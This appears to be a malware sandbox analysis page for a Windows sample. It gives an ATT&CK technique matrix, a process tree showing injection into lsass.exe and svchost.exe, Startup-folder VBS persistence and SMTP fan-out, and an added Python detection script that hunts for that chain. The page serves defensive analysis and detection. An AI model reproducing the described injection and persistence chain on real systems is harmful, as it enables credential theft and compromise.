Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 713 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 21 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 713 (technique name cut off at the end of the page)

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing

Discovery: 1 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 23 System Information Discovery; 331 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot

Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging

Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 111 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                      Process Injection
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1441717
Sample: vm6XYZzWOd.exe
Start date: 15/05/2024
Architecture: WINDOWS
Score: 100

The graph (an image on the original page) written out as a process tree. Numbers in parentheses are the graph's node IDs; the counters after a process name are the created-registry-value and created-file counts from the legend, reproduced as rendered; "started" and "injected" are the edge labels.

• Start node (2)
  DNS/IP: smtp.schule.at; mx1.hspherefilter.com; 3 other IPs or domains
  Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 15 other signatures
  Started: powershell.exe (10), vm6XYZzWOd.exe (13)

• powershell.exe (10; counters 2, 15)
  Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Found suspicious powershell code related to unpacking or dynamic code loading; Injects a PE file into a foreign processes
  Started: dllhost.exe (16), conhost.exe (19)

• vm6XYZzWOd.exe (13; counters 1, 8)
  Dropped files: C:\Users\user\AppData\...\$77Kaxhwswfup.exe (PE32); C:\Users\user\AppData\Local\Temp\$77a3a3b4 (PE32); C:\Users\user\AppData\Local\Temp\$778e373e (PE32); C:\Users\user\AppData\...\$77Kaxhwswfup.vbs (ASCII)
  Signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Started: $778e373e (21), $77a3a3b4 (24)

• dllhost.exe (16; counter 1)
  Signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 3 other signatures
  Injected: lsass.exe (26), svchost.exe (29), svchost.exe (31), 29 other processes (34)

• $778e373e (21)
  DNS/IP: zing.vn (120.138.68.152, port 587, VINAGAME-AS-VNVNGCorporationVN, Viet Nam); smtp.ciudad.com.ar (200.42.138.135, port 587, TelecomArgentinaSAAR, Argentina); 101 other IPs or domains
  Signatures: Multi AV Scanner detection for dropped file

• $77a3a3b4 (24; counter 1): no further edges shown

• lsass.exe (26, injected)
  Signatures: Writes to foreign memory regions
  Started: wscript.exe (36)

• svchost.exe (29, injected)
  Signatures: System process connects to network (likely due to code injection or exploit)

• svchost.exe (31, injected)
  DNS/IP: zing.vn; yomar.ma; 420 other IPs or domains

• wscript.exe (36; counter 1)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: $77Kaxhwswfup.exe (39)

• $77Kaxhwswfup.exe (39)
  Dropped files: C:\Users\user\AppData\Local\Temp\$77eec42d (PE32)
  Signatures: Multi AV Scanner detection for dropped file
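The chain the behavior graph reports (a system process, lsass.exe, spawning wscript.exe; wscript.exe launching an executable from AppData; a VBS written to the Startup folder; a dropped binary and an injected svchost.exe reaching SMTP servers on port 587) can be turned into host-hunting checks. The following is an added example written for this page, not Joe Sandbox code or output: it replays constructed Sysmon-style events modelled on the graph through a few rules. The event records, the allowlist of mail clients, the fan-out threshold, the Desktop location of the sample and the directories that the report abbreviates as "..." are all assumptions made for the example.

```python
"""
Hunting checks that replay the chain shown in the behavior graph above:
lsass.exe spawning wscript.exe, wscript.exe launching $77Kaxhwswfup.exe
from AppData, a VBS dropped into the Startup folder, and SMTP fan-out from
a dropped binary and an injected svchost.exe.  Added example; the events
below are constructed, not Joe Sandbox output.
"""
import re
from collections import defaultdict

STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
NO_CHILD_PARENTS = {"lsass.exe", "csrss.exe"}      # never spawn children on a healthy host
SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allowlist; tune per environment
FANOUT_THRESHOLD = 3                               # assumed: distinct destinations per process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, process, detail) tuples for the suspicious behaviours found."""
    hits = []
    dests = defaultdict(set)       # process -> distinct destination hosts (any port)
    smtp_dests = defaultdict(set)  # process -> destinations reached on an SMTP port
    for e in events:
        if e["kind"] == "process":
            parent, child = basename(e["parent"]), basename(e["image"])
            if parent in NO_CHILD_PARENTS:
                hits.append(("protected_process_spawned_child", child, parent))
            if parent in SCRIPT_HOSTS and "\\appdata\\" in e["image"].lower():
                hits.append(("script_host_launched_appdata_binary", child, e["image"]))
        elif e["kind"] == "file":
            path = e["path"]
            if STARTUP_DIR.search(path) and path.lower().endswith(SCRIPT_EXT):
                hits.append(("script_written_to_startup_folder", basename(e["image"]), path))
        elif e["kind"] == "net":
            proc = basename(e["image"])
            dests[proc].add(e["dst"])
            if e["port"] in SMTP_PORTS and proc not in MAIL_CLIENTS:
                smtp_dests[proc].add(e["dst"])
    # Aggregate per process so a spam run produces one finding, not hundreds.
    for proc, hosts in smtp_dests.items():
        hits.append(("smtp_from_non_mail_client", proc, f"{len(hosts)} SMTP destination(s)"))
    for proc, hosts in dests.items():
        if len(hosts) >= FANOUT_THRESHOLD:
            hits.append(("outbound_fanout", proc, f"{len(hosts)} distinct hosts"))
    return hits


# Constructed Sysmon-style events modelled on the graph.  Directories marked
# "assumed" are abbreviated ("...") in the report and filled in only here.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\vm6XYZzWOd.exe"              # location assumed
DROPPER = r"C:\Users\user\AppData\Local\Temp\$778e373e"        # path as reported
STAGE2 = r"C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe"    # directory assumed
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Windows\System32\dllhost.exe", "parent": PS},
    {"kind": "process", "image": DROPPER, "parent": SAMPLE},
    {"kind": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\lsass.exe"},
    {"kind": "process", "image": STAGE2, "parent": r"C:\Windows\System32\wscript.exe"},
    {"kind": "file", "image": SAMPLE,                          # Startup directory assumed
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"},
    {"kind": "file", "image": STAGE2, "path": r"C:\Users\user\AppData\Local\Temp\$77eec42d"},
    {"kind": "net", "image": DROPPER, "dst": "zing.vn", "port": 587},
    {"kind": "net", "image": DROPPER, "dst": "smtp.ciudad.com.ar", "port": 587},
    {"kind": "net", "image": DROPPER, "dst": "smtp.schule.at", "port": 587},    # port assumed
    {"kind": "net", "image": r"C:\Windows\System32\svchost.exe", "dst": "zing.vn", "port": 587},   # port assumed
    {"kind": "net", "image": r"C:\Windows\System32\svchost.exe", "dst": "yomar.ma", "port": 587},  # port assumed
    {"kind": "net", "image": r"C:\Program Files\Mail\OUTLOOK.EXE",                # benign baseline, constructed
     "dst": "smtp.example.net", "port": 587},
]

if __name__ == "__main__":
    for rule, proc, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:36} {proc:20} {detail}")
```

Running it against the constructed events yields six findings: the lsass.exe to wscript.exe parent/child relation, the script host launching a binary from AppData, the VBS in the Startup folder, SMTP connections from both the dropped binary and svchost.exe, and the fan-out from the dropped binary; the allowlisted mail client produces none. The svchost.exe finding is the one worth noting when tuning: svchost.exe legitimately talks to the network all the time, so it is the destination port, not the connection itself, that carries the signal here.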

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.